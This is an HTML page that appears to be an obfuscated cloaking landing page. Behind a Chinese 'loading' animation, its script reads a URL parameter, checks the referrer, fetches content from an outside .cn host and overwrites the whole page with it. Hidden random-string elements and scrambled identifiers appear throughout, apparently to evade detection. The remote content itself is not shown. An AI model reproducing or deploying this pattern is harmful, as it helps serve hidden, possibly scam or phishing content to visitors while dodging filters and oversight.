<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .hJSGvBlJJdV {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .hJSGvBlJJdV .EH752BM {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .hJSGvBlJJdV .content {
            line-height: 50px;
            text-align: center
        }

        .hJSGvBlJJdV .img {
            width: 100%
        }

        .hJSGvBlJJdV .mYT9UtYVqeg {
            text-align: center
        }

        .hJSGvBlJJdV .mYT9UtYVqeg span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .hJSGvBlJJdV .mYT9UtYVqeg span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .hJSGvBlJJdV .mYT9UtYVqeg span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .hJSGvBlJJdV .mYT9UtYVqeg span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .hJSGvBlJJdV .mYT9UtYVqeg span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .hJSGvBlJJdV .mYT9UtYVqeg span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .hJSGvBlJJdV .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function pUghdAofj(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var vj9sCaL = pUghdAofj('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ vj9sCaL +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ vj9sCaL +".html?a=share";
		}
		
        k9LPKHK=url+"#"+new Date().getTime();
        k9LPKHK && function() {
            $.get(k9LPKHK, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >lGHA3cCQkTYZCrP9VEdMhLPbjmnrcZ8aVqWrW5joUBcCkoLz6ZpWllgosnN7y</h1>
<span style='display:none'>esc0qz7IAIuc3qsIgVkseurYrZUYGfnttLSjYIS9Loob</span>
<b style='display:none' >eC74iFGQcfVcVB9OLa5Cb9QJxJOs33ShqHwlCuvE</b><div class="hJSGvBlJJdV">
    <div class="EH752BM">
        <div class="mYT9UtYVqeg">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>hZtKrhbx4SxBF6xJJMh9lnx3HltzgPurzjWcPMcSvtwSXsid0CziVAsTbBgIky</span>
<img  src='' style='display:none'>
<b style='display:none' >je6XlFP9SNSyQ</b>
<h1 style='display:none' >yHhR7DjWLU7BRw</h1></body>
</html>